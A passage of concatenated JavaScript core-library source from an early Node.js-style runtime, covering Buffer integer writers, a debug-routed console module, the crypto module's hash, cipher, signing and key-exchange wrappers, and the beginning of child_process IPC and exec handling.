    checkInt(this, value, offset, 1, 0x7f, -0x80);
  this[offset] = value;
  return offset + 1;
};


Buffer.prototype.writeInt16LE = function(value, offset, noAssert) {
  value = +value;
  offset = offset >>> 0;
  if (!noAssert)
    checkInt(this, value, offset, 2, 0x7fff, -0x8000);
  this[offset] = value;
  this[offset + 1] = (value >>> 8);
  return offset + 2;
};


Buffer.prototype.writeInt16BE = function(value, offset, noAssert) {
  value = +value;
  offset = offset >>> 0;
  if (!noAssert)
    checkInt(this, value, offset, 2, 0x7fff, -0x8000);
  this[offset] = (value >>> 8);
  this[offset + 1] = value;
  return offset + 2;
};


Buffer.prototype.writeInt32LE = function(value, offset, noAssert) {
  value = +value;
  offset = offset >>> 0;
  if (!noAssert)
    checkInt(this, value, offset, 4, 0x7fffffff, -0x80000000);
  this[offset] = value;
  this[offset + 1] = (value >>> 8);
  this[offset + 2] = (value >>> 16);
  this[offset + 3] = (value >>> 24);
  return offset + 4;
};


Buffer.prototype.writeInt32BE = function(value, offset, noAssert) {
  value = +value;
  offset = offset >>> 0;
  if (!noAssert)
    checkInt(this, value, offset, 4, 0x7fffffff, -0x80000000);
  this[offset] = (value >>> 24);
  this[offset + 1] = (value >>> 16);
  this[offset + 2] = (value >>> 8);
  this[offset + 3] = value;
  return offset + 4;
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                

========






















var util = require('util');

exports.log = function () {
    var s = util.format.apply(this, arguments) + '\n';
    process.dbg('JS : ' + s);
};

exports.info = exports.log;


exports.warn = function() {
    var s = util.format.apply(this, arguments) + '\n';
    process.dbg("JS : STDERR : " + s);
};


exports.error = exports.warn;


exports.dir = function (object) {
    var s = util.inspect(object) + '\n';
    process.dbg('JS : ' + s);
};


var times = {};
exports.time = function(label) {
  times[label] = Date.now();
};


exports.timeEnd = function(label) {
  var time = times[label];
  if (!time) {
    throw new Error('No such label: ' + label);
  }
  var duration = Date.now() - time;
  exports.log('%s: %dms', label, duration);
};


exports.trace = function(label) {
  
  
  var err = new Error;
  err.name = 'Trace';
  err.message = label || '';
  Error.captureStackTrace(err, arguments.callee);
  console.error(err.stack);
};


exports.assert = function(expression) {
  if (!expression) {
    var arr = Array.prototype.slice.call(arguments, 1);
    require('assert').ok(false, util.format.apply(this, arr));
  }
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              

========






















module.exports = process.binding('constants');
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         

========

























exports.DEFAULT_ENCODING = 'buffer';

try {
  var binding = process.binding('crypto');
  var randomBytes = binding.randomBytes;
  var pseudoRandomBytes = binding.pseudoRandomBytes;
  var getCiphers = binding.getCiphers;
  var getHashes = binding.getHashes;
} catch (e) {
  throw new Error('node.js not compiled with openssl crypto support.');
}

var constants = require('constants');
var stream = require('stream');
var util = require('util');

var DH_GENERATOR = 2;




function toBuf(str, encoding) {
  encoding = encoding || 'binary';
  if (util.isString(str)) {
    if (encoding === 'buffer')
      encoding = 'binary';
    str = new Buffer(str, encoding);
  }
  return str;
}
exports._toBuf = toBuf;


var assert = require('assert');
var StringDecoder = require('string_decoder').StringDecoder;


function LazyTransform(options) {
  this._options = options;
}
util.inherits(LazyTransform, stream.Transform);

[
  '_readableState',
  '_writableState',
  '_transformState'
].forEach(function(prop, i, props) {
  Object.defineProperty(LazyTransform.prototype, prop, {
    get: function() {
      stream.Transform.call(this, this._options);
      this._writableState.decodeStrings = false;
      this._writableState.defaultEncoding = 'binary';
      return this[prop];
    },
    set: function(val) {
      Object.defineProperty(this, prop, {
        value: val,
        enumerable: true,
        configurable: true,
        writable: true
      });
    },
    configurable: true,
    enumerable: true
  });
});


exports.createHash = exports.Hash = Hash;
function Hash(algorithm, options) {
  if (!(this instanceof Hash))
    return new Hash(algorithm, options);
  this._handle = new binding.Hash(algorithm);
  LazyTransform.call(this, options);
}

util.inherits(Hash, LazyTransform);

Hash.prototype._transform = function(chunk, encoding, callback) {
  this._handle.update(chunk, encoding);
  callback();
};

Hash.prototype._flush = function(callback) {
  var encoding = this._readableState.encoding || 'buffer';
  this.push(this._handle.digest(encoding), encoding);
  callback();
};

Hash.prototype.update = function(data, encoding) {
  encoding = encoding || exports.DEFAULT_ENCODING;
  if (encoding === 'buffer' && util.isString(data))
    encoding = 'binary';
  this._handle.update(data, encoding);
  return this;
};


Hash.prototype.digest = function(outputEncoding) {
  outputEncoding = outputEncoding || exports.DEFAULT_ENCODING;
  return this._handle.digest(outputEncoding);
};


exports.createHmac = exports.Hmac = Hmac;

function Hmac(hmac, key, options) {
  if (!(this instanceof Hmac))
    return new Hmac(hmac, key, options);
  this._handle = new binding.Hmac();
  this._handle.init(hmac, toBuf(key));
  LazyTransform.call(this, options);
}

util.inherits(Hmac, LazyTransform);

Hmac.prototype.update = Hash.prototype.update;
Hmac.prototype.digest = Hash.prototype.digest;
Hmac.prototype._flush = Hash.prototype._flush;
Hmac.prototype._transform = Hash.prototype._transform;


function getDecoder(decoder, encoding) {
  if (encoding === 'utf-8') encoding = 'utf8';  
  decoder = decoder || new StringDecoder(encoding);
  assert(decoder.encoding === encoding, 'Cannot change encoding');
  return decoder;
}


exports.createCipher = exports.Cipher = Cipher;
function Cipher(cipher, password, options) {
  if (!(this instanceof Cipher))
    return new Cipher(cipher, password, options);
  this._handle = new binding.CipherBase(true);

  this._handle.init(cipher, toBuf(password));
  this._decoder = null;

  LazyTransform.call(this, options);
}

util.inherits(Cipher, LazyTransform);

Cipher.prototype._transform = function(chunk, encoding, callback) {
  this.push(this._handle.update(chunk, encoding));
  callback();
};

Cipher.prototype._flush = function(callback) {
  try {
    this.push(this._handle.final());
  } catch (e) {
    callback(e);
    return;
  }
  callback();
};

Cipher.prototype.update = function(data, inputEncoding, outputEncoding) {
  inputEncoding = inputEncoding || exports.DEFAULT_ENCODING;
  outputEncoding = outputEncoding || exports.DEFAULT_ENCODING;

  var ret = this._handle.update(data, inputEncoding);

  if (outputEncoding && outputEncoding !== 'buffer') {
    this._decoder = getDecoder(this._decoder, outputEncoding);
    ret = this._decoder.write(ret);
  }

  return ret;
};


Cipher.prototype.final = function(outputEncoding) {
  outputEncoding = outputEncoding || exports.DEFAULT_ENCODING;
  var ret = this._handle.final();

  if (outputEncoding && outputEncoding !== 'buffer') {
    this._decoder = getDecoder(this._decoder, outputEncoding);
    ret = this._decoder.end(ret);
  }

  return ret;
};


Cipher.prototype.setAutoPadding = function(ap) {
  this._handle.setAutoPadding(ap);
  return this;
};



exports.createCipheriv = exports.Cipheriv = Cipheriv;
function Cipheriv(cipher, key, iv, options) {
  if (!(this instanceof Cipheriv))
    return new Cipheriv(cipher, key, iv, options);
  this._handle = new binding.CipherBase(true);
  this._handle.initiv(cipher, toBuf(key), toBuf(iv));
  this._decoder = null;

  LazyTransform.call(this, options);
}

util.inherits(Cipheriv, LazyTransform);

Cipheriv.prototype._transform = Cipher.prototype._transform;
Cipheriv.prototype._flush = Cipher.prototype._flush;
Cipheriv.prototype.update = Cipher.prototype.update;
Cipheriv.prototype.final = Cipher.prototype.final;
Cipheriv.prototype.setAutoPadding = Cipher.prototype.setAutoPadding;

Cipheriv.prototype.getAuthTag = function() {
  return this._handle.getAuthTag();
};


Cipheriv.prototype.setAuthTag = function(tagbuf) {
  this._handle.setAuthTag(tagbuf);
};

Cipheriv.prototype.setAAD = function(aadbuf) {
  this._handle.setAAD(aadbuf);
};


exports.createDecipher = exports.Decipher = Decipher;
function Decipher(cipher, password, options) {
  if (!(this instanceof Decipher))
    return new Decipher(cipher, password, options);

  this._handle = new binding.CipherBase(false);
  this._handle.init(cipher, toBuf(password));
  this._decoder = null;

  LazyTransform.call(this, options);
}

util.inherits(Decipher, LazyTransform);

Decipher.prototype._transform = Cipher.prototype._transform;
Decipher.prototype._flush = Cipher.prototype._flush;
Decipher.prototype.update = Cipher.prototype.update;
Decipher.prototype.final = Cipher.prototype.final;
Decipher.prototype.finaltol = Cipher.prototype.final;
Decipher.prototype.setAutoPadding = Cipher.prototype.setAutoPadding;



exports.createDecipheriv = exports.Decipheriv = Decipheriv;
function Decipheriv(cipher, key, iv, options) {
  if (!(this instanceof Decipheriv))
    return new Decipheriv(cipher, key, iv, options);

  this._handle = new binding.CipherBase(false);
  this._handle.initiv(cipher, toBuf(key), toBuf(iv));
  this._decoder = null;

  LazyTransform.call(this, options);
}

util.inherits(Decipheriv, LazyTransform);

Decipheriv.prototype._transform = Cipher.prototype._transform;
Decipheriv.prototype._flush = Cipher.prototype._flush;
Decipheriv.prototype.update = Cipher.prototype.update;
Decipheriv.prototype.final = Cipher.prototype.final;
Decipheriv.prototype.finaltol = Cipher.prototype.final;
Decipheriv.prototype.setAutoPadding = Cipher.prototype.setAutoPadding;
Decipheriv.prototype.getAuthTag = Cipheriv.prototype.getAuthTag;
Decipheriv.prototype.setAuthTag = Cipheriv.prototype.setAuthTag;
Decipheriv.prototype.setAAD = Cipheriv.prototype.setAAD;



exports.createSign = exports.Sign = Sign;
function Sign(algorithm, options) {
  if (!(this instanceof Sign))
    return new Sign(algorithm, options);
  this._handle = new binding.Sign();
  this._handle.init(algorithm);

  stream.Writable.call(this, options);
}

util.inherits(Sign, stream.Writable);

Sign.prototype._write = function(chunk, encoding, callback) {
  this._handle.update(chunk, encoding);
  callback();
};

Sign.prototype.update = Hash.prototype.update;

Sign.prototype.sign = function(options, encoding) {
  if (!options)
    throw new Error('No key provided to sign');

  var key = options.key || options;
  var passphrase = options.passphrase || null;
  var ret = this._handle.sign(toBuf(key), null, passphrase);

  encoding = encoding || exports.DEFAULT_ENCODING;
  if (encoding && encoding !== 'buffer')
    ret = ret.toString(encoding);

  return ret;
};



exports.createVerify = exports.Verify = Verify;
function Verify(algorithm, options) {
  if (!(this instanceof Verify))
    return new Verify(algorithm, options);

  this._handle = new binding.Verify;
  this._handle.init(algorithm);

  stream.Writable.call(this, options);
}

util.inherits(Verify, stream.Writable);

Verify.prototype._write = Sign.prototype._write;
Verify.prototype.update = Sign.prototype.update;

Verify.prototype.verify = function(object, signature, sigEncoding) {
  sigEncoding = sigEncoding || exports.DEFAULT_ENCODING;
  return this._handle.verify(toBuf(object), toBuf(signature, sigEncoding));
};

exports.publicEncrypt = function(options, buffer) {
  var key = options.key || options;
  var padding = options.padding || constants.RSA_PKCS1_OAEP_PADDING;
  return binding.publicEncrypt(toBuf(key), buffer, padding);
};

exports.privateDecrypt = function(options, buffer) {
  var key = options.key || options;
  var passphrase = options.passphrase || null;
  var padding = options.padding || constants.RSA_PKCS1_OAEP_PADDING;
  return binding.privateDecrypt(toBuf(key), buffer, padding, passphrase);
};



exports.createDiffieHellman = exports.DiffieHellman = DiffieHellman;

function DiffieHellman(sizeOrKey, keyEncoding, generator, genEncoding) {
  if (!(this instanceof DiffieHellman))
    return new DiffieHellman(sizeOrKey, keyEncoding, generator, genEncoding);

  if (keyEncoding) {
    if (typeof keyEncoding !== 'string' ||
        (!Buffer.isEncoding(keyEncoding) && keyEncoding !== 'buffer')) {
      genEncoding = generator;
      generator = keyEncoding;
      keyEncoding = false;
    }
  }

  keyEncoding = keyEncoding || exports.DEFAULT_ENCODING;
  genEncoding = genEncoding || exports.DEFAULT_ENCODING;

  if (typeof sizeOrKey !== 'number')
    sizeOrKey = toBuf(sizeOrKey, keyEncoding);

  if (!generator)
    generator = DH_GENERATOR;
  else if (typeof generator !== 'number')
    generator = toBuf(generator, genEncoding);

  this._handle = new binding.DiffieHellman(sizeOrKey, generator);
  Object.defineProperty(this, 'verifyError', {
    enumerable: true,
    value: this._handle.verifyError,
    writable: false
  });
}


exports.DiffieHellmanGroup =
    exports.createDiffieHellmanGroup =
    exports.getDiffieHellman = DiffieHellmanGroup;

function DiffieHellmanGroup(name) {
  if (!(this instanceof DiffieHellmanGroup))
    return new DiffieHellmanGroup(name);
  this._handle = new binding.DiffieHellmanGroup(name);
  Object.defineProperty(this, 'verifyError', {
    enumerable: true,
    value: this._handle.verifyError,
    writable: false
  });
}


DiffieHellmanGroup.prototype.generateKeys =
    DiffieHellman.prototype.generateKeys =
    dhGenerateKeys;

function dhGenerateKeys(encoding) {
  var keys = this._handle.generateKeys();
  encoding = encoding || exports.DEFAULT_ENCODING;
  if (encoding && encoding !== 'buffer')
    keys = keys.toString(encoding);
  return keys;
}


DiffieHellmanGroup.prototype.computeSecret =
    DiffieHellman.prototype.computeSecret =
    dhComputeSecret;

function dhComputeSecret(key, inEnc, outEnc) {
  inEnc = inEnc || exports.DEFAULT_ENCODING;
  outEnc = outEnc || exports.DEFAULT_ENCODING;
  var ret = this._handle.computeSecret(toBuf(key, inEnc));
  if (outEnc && outEnc !== 'buffer')
    ret = ret.toString(outEnc);
  return ret;
}


DiffieHellmanGroup.prototype.getPrime =
    DiffieHellman.prototype.getPrime =
    dhGetPrime;

function dhGetPrime(encoding) {
  var prime = this._handle.getPrime();
  encoding = encoding || exports.DEFAULT_ENCODING;
  if (encoding && encoding !== 'buffer')
    prime = prime.toString(encoding);
  return prime;
}


DiffieHellmanGroup.prototype.getGenerator =
    DiffieHellman.prototype.getGenerator =
    dhGetGenerator;

function dhGetGenerator(encoding) {
  var generator = this._handle.getGenerator();
  encoding = encoding || exports.DEFAULT_ENCODING;
  if (encoding && encoding !== 'buffer')
    generator = generator.toString(encoding);
  return generator;
}


DiffieHellmanGroup.prototype.getPublicKey =
    DiffieHellman.prototype.getPublicKey =
    dhGetPublicKey;

function dhGetPublicKey(encoding) {
  var key = this._handle.getPublicKey();
  encoding = encoding || exports.DEFAULT_ENCODING;
  if (encoding && encoding !== 'buffer')
    key = key.toString(encoding);
  return key;
}


DiffieHellmanGroup.prototype.getPrivateKey =
    DiffieHellman.prototype.getPrivateKey =
    dhGetPrivateKey;

function dhGetPrivateKey(encoding) {
  var key = this._handle.getPrivateKey();
  encoding = encoding || exports.DEFAULT_ENCODING;
  if (encoding && encoding !== 'buffer')
    key = key.toString(encoding);
  return key;
}


DiffieHellman.prototype.setPublicKey = function(key, encoding) {
  encoding = encoding || exports.DEFAULT_ENCODING;
  this._handle.setPublicKey(toBuf(key, encoding));
  return this;
};


DiffieHellman.prototype.setPrivateKey = function(key, encoding) {
  encoding = encoding || exports.DEFAULT_ENCODING;
  this._handle.setPrivateKey(toBuf(key, encoding));
  return this;
};


function ECDH(curve) {
  if (!util.isString(curve))
    throw new TypeError('curve should be a string');

  this._handle = new binding.ECDH(curve);
}

exports.createECDH = function createECDH(curve) {
  return new ECDH(curve);
};

ECDH.prototype.computeSecret = DiffieHellman.prototype.computeSecret;
ECDH.prototype.setPrivateKey = DiffieHellman.prototype.setPrivateKey;
ECDH.prototype.setPublicKey = DiffieHellman.prototype.setPublicKey;
ECDH.prototype.getPrivateKey = DiffieHellman.prototype.getPrivateKey;

ECDH.prototype.generateKeys = function generateKeys(encoding, format) {
  this._handle.generateKeys();

  return this.getPublicKey(encoding, format);
};

ECDH.prototype.getPublicKey = function getPublicKey(encoding, format) {
  var f;
  if (format) {
    if (typeof format === 'number')
      f = format;
    if (format === 'compressed')
      f = constants.POINT_CONVERSION_COMPRESSED;
    else if (format === 'hybrid')
      f = constants.POINT_CONVERSION_HYBRID;
    
    else if (format === 'uncompressed')
      f = constants.POINT_CONVERSION_UNCOMPRESSED;
    else
      throw TypeError('Bad format: ' + format);
  } else {
    f = constants.POINT_CONVERSION_UNCOMPRESSED;
  }
  var key = this._handle.getPublicKey(f);
  encoding = encoding || exports.DEFAULT_ENCODING;
  if (encoding && encoding !== 'buffer')
    key = key.toString(encoding);
  return key;
};



exports.pbkdf2 = function(password,
                          salt,
                          iterations,
                          keylen,
                          digest,
                          callback) {
  if (util.isFunction(digest)) {
    callback = digest;
    digest = undefined;
  }

  if (!util.isFunction(callback))
    throw new Error('No callback provided to pbkdf2');

  return pbkdf2(password, salt, iterations, keylen, digest, callback);
};


exports.pbkdf2Sync = function(password, salt, iterations, keylen, digest) {
  return pbkdf2(password, salt, iterations, keylen, digest);
};


function pbkdf2(password, salt, iterations, keylen, digest, callback) {
  password = toBuf(password);
  salt = toBuf(salt);

  if (exports.DEFAULT_ENCODING === 'buffer')
    return binding.PBKDF2(password, salt, iterations, keylen, digest, callback);

  
  var encoding = exports.DEFAULT_ENCODING;
  if (callback) {
    function next(er, ret) {
      if (ret)
        ret = ret.toString(encoding);
      callback(er, ret);
    }
    binding.PBKDF2(password, salt, iterations, keylen, digest, next);
  } else {
    var ret = binding.PBKDF2(password, salt, iterations, keylen, digest);
    return ret.toString(encoding);
  }
}


exports.Certificate = Certificate;

function Certificate() {
  if (!(this instanceof Certificate))
    return new Certificate();

  this._handle = new binding.Certificate();
}


Certificate.prototype.verifySpkac = function(object) {
  return this._handle.verifySpkac(object);
};


Certificate.prototype.exportPublicKey = function(object, encoding) {
  return this._handle.exportPublicKey(toBuf(object, encoding));
};


Certificate.prototype.exportChallenge = function(object, encoding) {
  return this._handle.exportChallenge(toBuf(object, encoding));
};


exports.setEngine = function setEngine(id, flags) {
  if (!util.isString(id))
    throw new TypeError('id should be a string');

  if (flags && !util.isNumber(flags))
    throw new TypeError('flags should be a number, if present');
  flags = flags >>> 0;

  
  if (flags === 0)
    flags = constants.ENGINE_METHOD_ALL;

  return binding.setEngine(id, flags);
};

exports.randomBytes = randomBytes;
exports.pseudoRandomBytes = pseudoRandomBytes;

exports.rng = randomBytes;
exports.prng = pseudoRandomBytes;


exports.getCiphers = function() {
  return filterDuplicates(getCiphers.call(null, arguments));
};


exports.getHashes = function() {
  return filterDuplicates(getHashes.call(null, arguments));

};


function filterDuplicates(names) {
  
  
  var ctx = {};
  names.forEach(function(name) {
    var key = name;
    if (/^[0-9A-Z\-]+$/.test(key)) key = key.toLowerCase();
    if (!ctx.hasOwnProperty(key) || ctx[key] < name)
      ctx[key] = name;
  });

  return Object.getOwnPropertyNames(ctx).map(function(key) {
    return ctx[key];
  }).sort();
}


exports.__defineGetter__('createCredentials', util.deprecate(function() {
  return require('tls').createSecureContext;
}, 'createCredentials() is deprecated, use tls.createSecureContext instead'));

exports.__defineGetter__('Credentials', util.deprecate(function() {
  return require('tls').SecureContext;
}, 'Credentials is deprecated, use tls.createSecureContext instead'));
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   

========






















var StringDecoder = require('string_decoder').StringDecoder;
var EventEmitter = require('events').EventEmitter;
var net = require('net');
var dgram = require('dgram');
var assert = require('assert');
var util = require('util');

var Process = process.binding('process_wrap').Process;
var uv = process.binding('uv');

var spawn_sync; 
var constants;  

var errnoException = util._errnoException;
var handleWraps = {};

function handleWrapGetter(name, callback) {
  var cons;

  Object.defineProperty(handleWraps, name, {
    get: function() {
      if (!util.isUndefined(cons)) return cons;
      return cons = callback();
    }
  });
}

handleWrapGetter('Pipe', function() {
  return process.binding('pipe_wrap').Pipe;
});

handleWrapGetter('TTY', function() {
  return process.binding('tty_wrap').TTY;
});

handleWrapGetter('TCP', function() {
  return process.binding('tcp_wrap').TCP;
});

handleWrapGetter('UDP', function() {
  return process.binding('udp_wrap').UDP;
});


function createPipe(ipc) {
  return new handleWraps.Pipe(ipc);
}

function createSocket(pipe, readable) {
  var s = new net.Socket({ handle: pipe });

  if (readable) {
    s.writable = false;
    s.readable = true;
  } else {
    s.writable = true;
    s.readable = false;
  }

  return s;
}




var handleConversion = {
  'net.Native': {
    simultaneousAccepts: true,

    send: function(message, handle) {
      return handle;
    },

    got: function(message, handle, emit) {
      emit(handle);
    }
  },

  'net.Server': {
    simultaneousAccepts: true,

    send: function(message, server) {
      return server._handle;
    },

    got: function(message, handle, emit) {
      var server = new net.Server();
      server.listen(handle, function() {
        emit(server);
      });
    }
  },

  'net.Socket': {
    send: function(message, socket) {
      if (!socket._handle)
        return;

      
      if (socket.server) {
        
        message.key = socket.server._connectionKey;

        var firstTime = !this._channel.sockets.send[message.key];
        var socketList = getSocketList('send', this, message.key);

        
        
        
        if (firstTime) socket.server._setupSlave(socketList);

        
        socket.server._connections--;
      }

      
      
      var handle = socket._handle;
      handle.onread = function() {};
      socket._handle = null;

      return handle;
    },

    postSend: function(handle) {
      
      if (handle)
        handle.close();
    },

    got: function(message, handle, emit) {
      var socket = new net.Socket({handle: handle});
      socket.readable = socket.writable = true;

      
      if (message.key) {

        
        var socketList = getSocketList('got', this, message.key);
        socketList.add({
          socket: socket
        });
      }

      emit(socket);
    }
  },

  'dgram.Native': {
    simultaneousAccepts: false,

    send: function(message, handle) {
      return handle;
    },

    got: function(message, handle, emit) {
      emit(handle);
    }
  },

  'dgram.Socket': {
    simultaneousAccepts: false,

    send: function(message, socket) {
      message.dgramType = socket.type;

      return socket._handle;
    },

    got: function(message, handle, emit) {
      var socket = new dgram.Socket(message.dgramType);

      socket.bind(handle, function() {
        emit(socket);
      });
    }
  }
};


function SocketListSend(slave, key) {
  EventEmitter.call(this);

  this.key = key;
  this.slave = slave;
}
util.inherits(SocketListSend, EventEmitter);

SocketListSend.prototype._request = function(msg, cmd, callback) {
  var self = this;

  if (!this.slave.connected) return onclose();
  this.slave.send(msg);

  function onclose() {
    self.slave.removeListener('internalMessage', onreply);
    callback(new Error('Slave closed before reply'));
  };

  function onreply(msg) {
    if (!(msg.cmd === cmd && msg.key === self.key)) return;
    self.slave.removeListener('disconnect', onclose);
    self.slave.removeListener('internalMessage', onreply);

    callback(null, msg);
  };

  this.slave.once('disconnect', onclose);
  this.slave.on('internalMessage', onreply);
};

SocketListSend.prototype.close = function close(callback) {
  this._request({
    cmd: 'NODE_SOCKET_NOTIFY_CLOSE',
    key: this.key
  }, 'NODE_SOCKET_ALL_CLOSED', callback);
};

SocketListSend.prototype.getConnections = function getConnections(callback) {
  this._request({
    cmd: 'NODE_SOCKET_GET_COUNT',
    key: this.key
  }, 'NODE_SOCKET_COUNT', function(err, msg) {
    if (err) return callback(err);
    callback(null, msg.count);
  });
};


function SocketListReceive(slave, key) {
  EventEmitter.call(this);

  var self = this;

  this.connections = 0;
  this.key = key;
  this.slave = slave;

  function onempty() {
    if (!self.slave.connected) return;

    self.slave.send({
      cmd: 'NODE_SOCKET_ALL_CLOSED',
      key: self.key
    });
  }

  this.slave.on('internalMessage', function(msg) {
    if (msg.key !== self.key) return;

    if (msg.cmd === 'NODE_SOCKET_NOTIFY_CLOSE') {
      
      if (self.connections === 0) return onempty();

      
      self.once('empty', onempty);
    } else if (msg.cmd === 'NODE_SOCKET_GET_COUNT') {
      if (!self.slave.connected) return;
      self.slave.send({
        cmd: 'NODE_SOCKET_COUNT',
        key: self.key,
        count: self.connections
      });
    }
  });
}
util.inherits(SocketListReceive, EventEmitter);

SocketListReceive.prototype.add = function(obj) {
  var self = this;

  this.connections++;

  
  obj.socket.once('close', function() {
    self.connections--;

    if (self.connections === 0) self.emit('empty');
  });
};

function getSocketList(type, slave, key) {
  var sockets = slave._channel.sockets[type];
  var socketList = sockets[key];
  if (!socketList) {
    var Construct = type === 'send' ? SocketListSend : SocketListReceive;
    socketList = sockets[key] = new Construct(slave, key);
  }
  return socketList;
}

var INTERNAL_PREFIX = 'NODE_';
function handleMessage(target, message, handle) {
  var eventName = 'message';
  if (!util.isNull(message) &&
      util.isObject(message) &&
      util.isString(message.cmd) &&
      message.cmd.length > INTERNAL_PREFIX.length &&
      message.cmd.slice(0, INTERNAL_PREFIX.length) === INTERNAL_PREFIX) {
    eventName = 'internalMessage';
  }
  target.emit(eventName, message, handle);
}

function setupChannel(target, channel) {
  target._channel = channel;
  target._handleQueue = null;

  var decoder = new StringDecoder('utf8');
  var jsonBuffer = '';
  channel.buffering = false;
  channel.onread = function(nread, pool, recvHandle) {
    
    if (pool) {
      jsonBuffer += decoder.write(pool);

      var i, start = 0;

      
      while ((i = jsonBuffer.indexOf('\n', start)) >= 0) {
        var json = jsonBuffer.slice(start, i);
        var message = JSON.parse(json);

        
        
        
        if (message && message.cmd === 'NODE_HANDLE')
          handleMessage(target, message, recvHandle);
        else
          handleMessage(target, message, undefined);

        start = i + 1;
      }
      jsonBuffer = jsonBuffer.slice(start);
      this.buffering = jsonBuffer.length !== 0;

    } else {
      this.buffering = false;
      target.disconnect();
      channel.onread = nop;
      channel.close();
      maybeClose(target);
    }
  };

  
  channel.sockets = { got: {}, send: {} };

  
  target.on('internalMessage', function(message, handle) {
    
    if (message.cmd === 'NODE_HANDLE_ACK') {
      assert(util.isArray(target._handleQueue));
      var queue = target._handleQueue;
      target._handleQueue = null;

      queue.forEach(function(args) {
        target._send(args.message, args.handle, false);
      });

      
      if (!target.connected && target._channel && !target._handleQueue)
        target._disconnect();

      return;
    }

    if (message.cmd !== 'NODE_HANDLE') return;

    
    
    
    
    target._send({ cmd: 'NODE_HANDLE_ACK' }, null, true);

    var obj = handleConversion[message.type];

    
    if (process.platform === 'win32') {
      handle._simultaneousAccepts = false;
      net._setSimultaneousAccepts(handle);
    }

    
    obj.got.call(this, message, handle, function(handle) {
      handleMessage(target, message.msg, handle);
    });
  });

  target.send = function(message, handle) {
    if (!this.connected)
      this.emit('error', new Error('channel closed'));
    else
      this._send(message, handle, false);
  };

  target._send = function(message, handle, swallowErrors) {
    assert(this.connected || this._channel);

    if (util.isUndefined(message))
      throw new TypeError('message cannot be undefined');

    
    if (handle) {
      
      message = {
        cmd: 'NODE_HANDLE',
        type: null,
        msg: message
      };

      if (handle instanceof net.Socket) {
        message.type = 'net.Socket';
      } else if (handle instanceof net.Server) {
        message.type = 'net.Server';
      } else if (handle instanceof process.binding('tcp_wrap').TCP ||
                 handle instanceof process.binding('pipe_wrap').Pipe) {
        message.type = 'net.Native';
      } else if (handle instanceof dgram.Socket) {
        message.type = 'dgram.Socket';
      } else if (handle instanceof process.binding('udp_wrap').UDP) {
        message.type = 'dgram.Native';
      } else {
        throw new TypeError("This handle type can't be sent");
      }

      
      if (this._handleQueue) {
        this._handleQueue.push({ message: message.msg, handle: handle });
        return;
      }

      var obj = handleConversion[message.type];

      
      handle =
          handleConversion[message.type].send.call(target, message, handle);

      
      
      if (!handle)
        message = message.msg;

      
      if (obj.simultaneousAccepts) {
        net._setSimultaneousAccepts(handle);
      }
    } else if (this._handleQueue &&
               !(message && message.cmd === 'NODE_HANDLE_ACK')) {
      
      this._handleQueue.push({ message: message, handle: null });
      return;
    }

    var req = { oncomplete: nop };
    var string = JSON.stringify(message) + '\n';
    var err = channel.writeUtf8String(req, string, handle);

    if (err) {
      if (!swallowErrors)
        this.emit('error', errnoException(err, 'write'));
    } else if (handle && !this._handleQueue) {
      this._handleQueue = [];
    }

    if (obj && obj.postSend) {
      req.oncomplete = obj.postSend.bind(null, handle);
    }

    
    return channel.writeQueueSize < (65536 * 2);
  };

  
  
  
  
  
  
  
  
  
  target.connected = true;

  target.disconnect = function() {
    if (!this.connected) {
      this.emit('error', new Error('IPC channel is already disconnected'));
      return;
    }

    
    this.connected = false;

    
    
    
    if (!this._handleQueue)
      this._disconnect();
  };

  target._disconnect = function() {
    assert(this._channel);

    
    this._channel = null;

    var fired = false;
    function finish() {
      if (fired) return;
      fired = true;

      channel.close();
      target.emit('disconnect');
    }

    
    if (channel.buffering) {
      this.once('message', finish);
      this.once('internalMessage', finish);

      return;
    }

    process.nextTick(finish);
  };

  channel.readStart();
}


function nop() { }

exports.fork = function(modulePath ) {

  
  var options, args, execArgv;
  if (util.isArray(arguments[1])) {
    args = arguments[1];
    options = util._extend({}, arguments[2]);
  } else {
    args = [];
    options = util._extend({}, arguments[1]);
  }

  
  execArgv = options.execArgv || process.execArgv;
  args = execArgv.concat([modulePath], args);

  
  
  options.stdio = options.silent ? ['pipe', 'pipe', 'pipe', 'ipc'] :
      [0, 1, 2, 'ipc'];

  options.execPath = options.execPath || process.execPath;

  return spawn(options.execPath, args, options);
};


exports._forkChild = function(fd) {
  
  var p = createPipe(true);
  p.open(fd);
  p.unref();
  setupChannel(process, p);

  var refs = 0;
  process.on('newListener', function(name) {
    if (name !== 'message' && name !== 'disconnect') return;
    if (++refs === 1) p.ref();
  });
  process.on('removeListener', function(name) {
    if (name !== 'message' && name !== 'disconnect') return;
    if (--refs === 0) p.unref();
  });
};


function normalizeExecArgs(command ) {
  var file, args, options, callback;

  if (util.isFunction(arguments[1])) {
    options = undefined;
    callback = arguments[1];
  } else {
    options = arguments[1];
    callback = arguments[2];
  }

  if (process.platform === 'win32') {
    file = process.env.comspec || 'cmd.exe';
    args = ['/s', '/c', '"' + command + '"'];
    
    
    options = util._extend({}, options);
    options.windowsVerbatimArguments = true;
  } else {
    file = '/bin/sh';
    args = ['-c', command];
  }

  if (options && options.shell)
    file = options.shell;

  return {
    cmd: command,
    file: file,
    args: args,
    options: options,
    callback: callback
  };
}


exports.exec = function(command ) {
  var opts = normalizeExecArgs.apply(null, arguments);
  return exports.execFile(opts.file,
                          opts.args,
                          opts.options,
                          opts.callback);
};


exports.execFile = function(file ) {
  var args, callback;
  var options = {
    encoding: 'utf8',
    timeout: 0,
    maxBuffer: 200 * 1024,
    killSignal: 'SIGTERM',
    cwd: null,
    env: null
  };

  

  if (util.isFunction(arguments[arguments.length - 1])) {
    callback = arguments[arguments.length - 1];
  }

  if (util.isArray(arguments[1])) {
    args = arguments[1];
    options = util._extend(options, arguments[2]);
  } else {
    args = [];
    options = util._extend(options, arguments[1]);
  }

  var child = spawn(file, args, {
